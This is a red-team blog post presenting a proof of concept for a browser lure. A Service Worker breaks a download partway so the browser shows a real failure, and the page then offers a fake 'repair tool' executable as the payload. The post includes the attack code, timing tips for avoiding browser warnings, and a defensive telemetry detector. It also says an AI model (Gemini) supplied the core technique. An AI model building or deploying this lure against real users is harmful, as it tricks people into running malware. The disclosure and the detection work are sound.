June 23, 2025
Bring Your Own Fix — Mr.D0x inspired variation of yet another "fix" attack
A downloadfix PoC using Service Workers to simulate failed downloads and trick users into running a "repair tool" — inspired by Mr.D0x's browser-based fix attacks.
Originally published on redteamer.tips
It all started with a tweet
I was scrolling through my timeline when I saw a tweet from Mr.D0x about a new variation of a “fix” attack — one that abuses browsers to socially engineer users into executing malicious commands. It was clever, creative, and immediately got the gears turning in my head.
So naturally, I jokingly replied:
“inb4 downloadfix”
And then I sat there staring at my own reply, thinking… wait. That could actually work.
The idea
What if you could simulate a failed download in the browser, and then convince the user to run a “repair tool” to fix it? The download looks legitimate, it appears to fail mid-stream with a genuine browser error, and then — oh how convenient — here’s a helpful tool to fix the problem.
Classic social engineering, but with a technical twist that makes the failed download look completely authentic.
From joke to PoC
I first pitched the idea to ChatGPT, which was… unhelpful. It kept suggesting overly complex approaches or telling me it wasn’t possible to control browser download behavior from JavaScript. Thanks for nothing.
Then I switched to Gemini 2.5 Pro, and it immediately gave me a solid approach: Service Workers.
Service Workers sit between your web page and the network. They can intercept fetch requests, manipulate responses, and — crucially — they can deliberately break a download mid-stream in a way that looks completely natural to the browser.
How it works
The attack flow is beautifully simple:
Step 1: Register the Service Worker
index.html registers a Service Worker (sw.js) and triggers a file download. Nothing suspicious — just a page that starts downloading a file.
<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.register('/sw.js')
      .then(() => {
        // Trigger the download after SW is active
        window.location.href = '/download/important-document.pdf';
      });
  }
</script>
Step 2: Intercept and sabotage
sw.js intercepts the fetch request for the download. It starts streaming a real file — actual bytes, proper headers, everything looks legitimate. The browser shows a download in progress.
Then, mid-stream, it deliberately throws an error.
self.addEventListener('fetch', (event) => {
  if (event.request.url.includes('/download/')) {
    event.respondWith(
      new Response(
        new ReadableStream({
          start(controller) {
            // Send some real data first...
            controller.enqueue(new Uint8Array([/* real file bytes */]));
            // Then kill the stream
            setTimeout(() => {
              controller.error('Network error');
            }, 1500);
          }
        }),
        { headers: { 'Content-Type': 'application/pdf' } }
      )
    );
  }
});
Step 3: The browser does our dirty work
The browser shows the download as “Failed - Network Error”. This is a genuine browser error message — not something we’re spoofing in the page. It looks completely authentic because, from the browser’s perspective, the download did fail.
Step 4: Serve the “repair tool”
After a deliberate delay (to avoid the browser’s “multiple downloads” warning), the page serves up the “repair tool” — a helpful little executable that will “fix” the corrupted download.
Of course, the “repair tool” is whatever payload you want it to be.
The delay is important. If you trigger the second download too quickly after the first, the browser will show a “This site is trying to download multiple files” prompt, which breaks the illusion.
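Seen from the defender's side, Steps 1 to 4 leave a recognizable sequence in download telemetry: an interrupted download from an origin, followed shortly afterwards by an executable from the same origin. The sketch below is an added example, not code from the downloadfix repository; the record fields (ts, origin, file, state), the extension list and the 120-second window are assumptions to adapt to whatever your browser or EDR telemetry actually exposes.

```javascript
// Constructed sample records. Field names are assumed, not a real browser or EDR schema.
const SAMPLE_EVENTS = [
  { ts: '2025-06-23T10:00:00Z', origin: 'https://docs.example', file: 'important-document.pdf', state: 'interrupted' },
  { ts: '2025-06-23T10:00:06Z', origin: 'https://docs.example', file: 'repair-tool.exe', state: 'complete' },
  { ts: '2025-06-23T10:05:00Z', origin: 'https://cdn.example', file: 'setup.msi', state: 'complete' },
  { ts: '2025-06-23T10:20:00Z', origin: 'https://files.example', file: 'report.pdf', state: 'interrupted' },
  { ts: '2025-06-23T10:20:30Z', origin: 'https://files.example', file: 'report.pdf', state: 'complete' },
];

// File types a "repair tool" lure would plausibly use (assumed list, extend as needed).
const RISKY_EXT = new Set(['exe', 'msi', 'scr', 'bat', 'cmd', 'ps1', 'js', 'vbs', 'hta', 'lnk']);

function extensionOf(file) {
  const dot = file.lastIndexOf('.');
  return dot === -1 ? '' : file.slice(dot + 1).toLowerCase();
}

// Returns one finding per interrupted download that is followed, within
// windowSeconds and from the same origin, by a download with a risky extension.
function findFailedThenExecutable(events, windowSeconds = 120) {
  const sorted = events
    .map((e) => ({ ...e, t: Date.parse(e.ts) }))
    .filter((e) => !Number.isNaN(e.t)) // drop records with unparseable timestamps
    .sort((a, b) => a.t - b.t);
  const lastFailure = new Map(); // origin -> most recent interrupted download
  const findings = [];
  for (const e of sorted) {
    if (e.state === 'interrupted') {
      lastFailure.set(e.origin, e);
      continue;
    }
    const failed = lastFailure.get(e.origin);
    if (!failed) continue;
    const gap = (e.t - failed.t) / 1000;
    if (gap <= windowSeconds && RISKY_EXT.has(extensionOf(e.file))) {
      findings.push({ origin: e.origin, failedFile: failed.file, followUp: e.file, gapSeconds: gap });
      lastFailure.delete(e.origin); // report each failure at most once
    }
  }
  return findings;
}

console.log(findFailedThenExecutable(SAMPLE_EVENTS));
```

A legitimate retry of the same document (the files.example pair) and an unrelated installer download (cdn.example) are not flagged; only the failed-then-executable pair is.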
TLDR
With AI and a bit of inspiration, it becomes trivial to rapidly prototype new TTPs. The idea went from a joke reply on a tweet to a working proof of concept in under an hour.
The uncomfortable truth: if you can think of it, you can build it within minutes or hours. The barrier between concept and weaponizable PoC has never been lower.
Source code: https://github.com/jfmaes/downloadfix
Stay creative, stay curious — and maybe think twice before clicking that “repair tool.”